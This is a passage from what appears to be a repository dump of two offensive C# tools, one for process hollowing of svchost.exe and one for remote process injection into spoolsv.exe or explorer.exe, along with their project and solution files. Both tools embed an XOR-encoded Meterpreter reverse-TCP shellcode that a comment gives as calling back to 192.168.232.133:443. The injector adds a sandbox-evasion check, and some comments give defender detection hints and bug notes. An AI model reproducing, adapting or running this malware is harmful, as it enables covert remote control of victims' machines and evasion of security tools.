    // XORed with key 0xfa
    // 511-byte encoded payload; it is decoded in place further down, just before the write.
    byte[] buf = new byte[511] {
        0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
        0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
        0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
        0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
        0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
        0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
        0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
        0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
        0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
        0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
        0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
        0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
        0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
        0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
        0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
        0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
        0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
        0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
        0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
        0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
        0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
        0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
        0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
        0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
        0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
        0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
        0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
        0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
        0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
        0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
        0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
        0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
        0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
        0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
        0x2f
    };

    // Start 'svchost.exe' in a suspended state
    // CREATE_SUSPENDED is a constant defined elsewhere in this class (not in this excerpt).
    // sInfo is passed with every field zero (cb included); cResult is printed, not checked.
    StartupInfo sInfo = new StartupInfo();
    ProcessInfo pInfo = new ProcessInfo();
    bool cResult = CreateProcess(null, "c:\\windows\\system32\\svchost.exe", IntPtr.Zero, IntPtr.Zero,
        false, CREATE_SUSPENDED, IntPtr.Zero, null, ref sInfo, out pInfo);
    Console.WriteLine($"Started 'svchost.exe' in a suspended state with PID {pInfo.ProcessId}. Success: {cResult}.");

    // Get Process Environment Block (PEB) memory address of suspended process (offset 0x10 from base image)
    // PROCESSBASICINFORMATION is a constant defined elsewhere in this class. The buffer length
    // is six pointer-sized fields, matching ProcessBasicInfo. PEB+0x10 is the ImageBaseAddress
    // field of the 64-bit PEB, i.e. the location that holds the pointer to the mapped executable.
    ProcessBasicInfo pbInfo = new ProcessBasicInfo();
    uint retLen = new uint();
    long qResult = ZwQueryInformationProcess(pInfo.hProcess, PROCESSBASICINFORMATION, ref pbInfo, (uint)(IntPtr.Size * 6), ref retLen);
    IntPtr baseImageAddr = (IntPtr)((Int64)pbInfo.PebAddress + 0x10);
    Console.WriteLine($"Got process information and located PEB address of process at {"0x" + baseImageAddr.ToString("x")}. Success: {qResult == 0}.");

    // Get entry point of the actual process executable
    // This one is a bit complicated, because this address differs for each process (due to Address Space Layout Randomization (ASLR))
    // From the PEB (address we got in last call), we have to do the following:
    // 1. Read executable address from first 8 bytes (Int64, offset 0) of PEB and read data chunk for further processing
    // 2. Read the field 'e_lfanew', 4 bytes at offset 0x3C from executable address to get the offset for the PE header
    // 3. Take the memory at this PE header add an offset of 0x28 to get the Entrypoint Relative Virtual Address (RVA) offset
    // 4. Read the value at the RVA offset address to get the offset of the executable entrypoint from the executable address
    // 5. Get the absolute address of the entrypoint by adding this value to the base executable address. Success!

    // 1. Read executable address from first 8 bytes (Int64, offset 0) of PEB and read data chunk for further processing
    // Both ReadProcessMemory results land in 'result' but are never tested; a failed read
    // leaves zero-filled buffers and the parsing below proceeds on them.
    byte[] procAddr = new byte[0x8];
    byte[] dataBuf = new byte[0x200];
    IntPtr bytesRW = new IntPtr();
    bool result = ReadProcessMemory(pInfo.hProcess, baseImageAddr, procAddr, procAddr.Length, out bytesRW);
    IntPtr executableAddress = (IntPtr)BitConverter.ToInt64(procAddr, 0);
    result = ReadProcessMemory(pInfo.hProcess, executableAddress, dataBuf, dataBuf.Length, out bytesRW);
    Console.WriteLine($"DEBUG: Executable base address: {"0x" + executableAddress.ToString("x")}.");

    // 2. Read the field 'e_lfanew', 4 bytes (UInt32) at offset 0x3C from executable address to get the offset for the PE header
    // (IMAGE_DOS_HEADER.e_lfanew: offset of the "PE\0\0" signature from the image base)
    uint e_lfanew = BitConverter.ToUInt32(dataBuf, 0x3c);
    Console.WriteLine($"DEBUG: e_lfanew offset: {"0x" + e_lfanew.ToString("x")}.");

    // 3. Take the memory at this PE header add an offset of 0x28 to get the Entrypoint Relative Virtual Address (RVA) offset
    // (+0x28 from the signature is IMAGE_OPTIONAL_HEADER.AddressOfEntryPoint for both PE32 and PE32+)
    uint rvaOffset = e_lfanew + 0x28;
    Console.WriteLine($"DEBUG: RVA offset: {"0x" + rvaOffset.ToString("x")}.");

    // 4. Read the 4 bytes (UInt32) at the RVA offset to get the offset of the executable entrypoint from the executable address
    // rvaOffset indexes into the 0x200-byte dataBuf without a bounds check; an out-of-range
    // value would surface as an ArgumentException from BitConverter rather than be handled.
    uint rva = BitConverter.ToUInt32(dataBuf, (int)rvaOffset);
    Console.WriteLine($"DEBUG: RVA value: {"0x" + rva.ToString("x")}.");

    // 5. Get the absolute address of the entrypoint by adding this value to the base executable address. Success!
    IntPtr entrypointAddr = (IntPtr)((Int64)executableAddress + rva);
    Console.WriteLine($"Got executable entrypoint address: {"0x" + entrypointAddr.ToString("x")}.");

    // Carrying on, decode the XOR payload
    // (in place, single-byte key 0xfa — the same key noted above the array)
    for (int i = 0; i < buf.Length; i++)
    {
        buf[i] = (byte)((uint)buf[i] ^ 0xfa);
    }
    Console.WriteLine("XOR-decoded payload.");

    // Overwrite the memory at the identified address to 'hijack' the entrypoint of the executable
    // No page-protection change is made first; the write result is printed but not checked.
    result = WriteProcessMemory(pInfo.hProcess, entrypointAddr, buf, buf.Length, out bytesRW);
    Console.WriteLine($"Overwrote entrypoint with payload. Success: {result}.");

    // Resume the thread to trigger our payload
    // ResumeThread returns the previous suspend count, hence the comparison with 1.
    uint rResult = ResumeThread(pInfo.hThread);
    Console.WriteLine($"Triggered payload. Success: {rResult == 1}. Check your listener!");
}
190 | }
191 | }
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Shellcode Process Hollowing")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Shellcode Process Hollowing")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d8b2f4f4-2b59-4457-b710-f15844570997")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/Shellcode Process Hollowing.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {D8B2F4F4-2B59-4457-B710-F15844570997}
8 | Exe
9 | Shellcode_Process_Hollowing
10 | Shellcode Process Hollowing
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/Shellcode Process Hollowing.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode Process Hollowing", "Shellcode Process Hollowing.csproj", "{D8B2F4F4-2B59-4457-B710-F15844570997}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|x64.ActiveCfg = Debug|x64
19 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|x64.Build.0 = Debug|x64
20 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|x64.ActiveCfg = Release|x64
23 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {21316190-097C-4FD2-A87D-733E0DA746F9}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Shellcode Process Injector/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Shellcode Process Injector/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Runtime.InteropServices;
4 | using System.Security.Principal;
5 |
6 | namespace RemoteShinject
7 | {
8 | public class Program
9 | {
// Desired-access mask for OpenProcess. 0x001F0FFF is PROCESS_ALL_ACCESS.
// Defender note: Sysmon Event ID 10 (ProcessAccess) records GrantedAccess; handles to
// explorer.exe/spoolsv.exe opened with 0x1F0FFF are a common hunting pivot.
[Flags]
public enum ProcessAccessFlags : uint
{
    All = 0x001F0FFF
}
// VirtualAllocEx allocation flags: MEM_COMMIT (0x1000) and MEM_RESERVE (0x2000);
// Main ORs both together.
[Flags]
public enum AllocationType
{
    Commit = 0x1000,
    Reserve = 0x2000
}
21 |
// Page protection for VirtualAllocEx. 0x40 is PAGE_EXECUTE_READWRITE.
// Defender note: a private RWX allocation created in another process is a strong
// injection indicator in its own right.
[Flags]
public enum MemoryProtection
{
    ExecuteReadWrite = 0x40
}
27 |
// kernel32!OpenProcess — Main requests PROCESS_ALL_ACCESS on each candidate PID and
// skips the PID when the returned handle is 0.
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);
30 |
// kernel32!VirtualAllocEx — allocates the payload-sized RWX region in the target;
// Main does not check the returned address before writing to it.
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
33 |
// kernel32!WriteProcessMemory — copies the decoded payload into the remote allocation.
// Defender note: cross-process writes are surfaced by the Microsoft-Windows-Threat-
// Intelligence ETW provider and, indirectly, by Sysmon Event ID 10 on the handle open.
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
36 |
// kernel32!CreateRemoteThread — starts a thread in the target at the allocation address.
// Defender note: this is exactly what Sysmon Event ID 8 (CreateRemoteThread) records,
// including source/target image and StartAddress.
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
39 |
// kernel32!VirtualAllocExNuma — Main calls it on the current process with 0x3000
// (MEM_COMMIT | MEM_RESERVE), 0x4 (PAGE_READWRITE) and NUMA node 0, and only compares the
// result with null (see the note in Main).
[System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
42 |
// kernel32!GetCurrentProcess — pseudo-handle to this process, used only for the
// VirtualAllocExNuma call in Main.
[System.Runtime.InteropServices.DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
45 |
// True when the owner SID of the current Windows identity is BUILTIN\Administrators,
// i.e. the process is running with an elevated token. Main uses this to choose the
// default injection target when no argument is supplied.
static bool IsElevated
{
    get
    {
        return WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid);
    }
}
53 |
// Entry point. Picks a target process (the single argument, or spoolsv/explorer depending
// on elevation), then performs remote shellcode injection:
// OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread.
// Defender notes: Sysmon Event ID 10 (ProcessAccess, GrantedAccess 0x1F0FFF) followed by
// Event ID 8 (CreateRemoteThread) from the same source image into spoolsv.exe or
// explorer.exe, together with a private RWX allocation in the target, is the observable
// chain. Apart from the OpenProcess handle, no API result is checked — failures are only
// echoed to the console.
public static void Main(string[] args)
{
    // Sandbox evasion
    // NOTE(review): IntPtr is a value type, so `mem == null` is always false (compiler
    // warning CS0472); this early return is never taken.
    IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
    if (mem == null)
    {
        return;
    }

    // Xor-encoded payload, key 0xfa
    // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
    // 511 bytes; decoded in place inside the loop below, right before the remote write.
    byte[] buf = new byte[511] {
        0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
        0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
        0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
        0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
        0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
        0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
        0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
        0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
        0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
        0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
        0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
        0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
        0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
        0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
        0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
        0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
        0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
        0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
        0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
        0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
        0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
        0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
        0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
        0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
        0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
        0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
        0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
        0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
        0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
        0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
        0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
        0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
        0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
        0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
        0x2f
    };

    int len = buf.Length;

    // Parse arguments, if given (process to inject)
    // One argument: explicit image name (without .exe). None: choose by elevation.
    // Anything else: print usage and exit.
    String procName = "";
    if (args.Length == 1)
    {
        procName = args[0];
    }
    else if (args.Length == 0) {
        // Inject based on elevation level
        if (IsElevated)
        {
            Console.WriteLine("Process is elevated.");
            procName = "spoolsv";
        }
        else
        {
            Console.WriteLine("Process is not elevated.");
            procName = "explorer";
        }
    }
    else
    {
        Console.WriteLine("Please give either one argument for a process to inject, e.g. \".\\ShInject.exe explorer\", or leave empty for auto-injection.");
        return;
    }

    Console.WriteLine($"Attempting to inject into {procName} process...");

    // Get process IDs
    Process[] expProc = Process.GetProcessesByName(procName);

    // If multiple processes exist, try to inject in all of them
    // NOTE(review): despite the comment above, the `break` at the end of the loop body
    // stops after the first PID for which OpenProcess returned a handle, so at most one
    // process is actually touched.
    for (int i = 0; i < expProc.Length; i++)
    {
        int pid = expProc[i].Id;

        // Get a handle on the process
        IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, pid);
        if ((int)hProcess == 0)
        {
            Console.WriteLine($"Failed to get handle on PID {pid}.");
            continue;
        }
        Console.WriteLine($"Got handle {hProcess} on PID {pid}.");

        // Allocate memory in the remote process
        // (RWX; the returned address is not validated before use)
        IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
        Console.WriteLine($"Allocated {len} bytes at address {expAddr} in remote process.");

        // Decode the payload
        // In-place XOR with key 0xfa; reached at most once because of the break below.
        for (int j = 0; j < buf.Length; j++)
        {
            buf[j] = (byte)((uint)buf[j] ^ 0xfa);
        }

        // Write the payload to the allocated bytes
        IntPtr bytesWritten;
        bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten);
        Console.WriteLine($"Wrote {bytesWritten} payload bytes (result: {procMemResult}).");

        // Start a thread in the target at the allocation; lpThreadId is IntPtr.Zero, so no
        // thread id is returned and the handle is not checked or closed.
        IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero);
        Console.WriteLine($"Created remote thread at {threadAddr}. Check your listener!");
        break;
    }
}
169 | }
170 | }
--------------------------------------------------------------------------------
/Shellcode Process Injector/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Shellcode Process Injector")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Shellcode Process Injector")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("e08baa9c-9d20-4c9a-8933-ec567f39f54c")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Shellcode Process Injector/Shellcode Process Injector.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}
8 | Exe
9 | Shellcode_Process_Injector
10 | Shellcode Process Injector
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
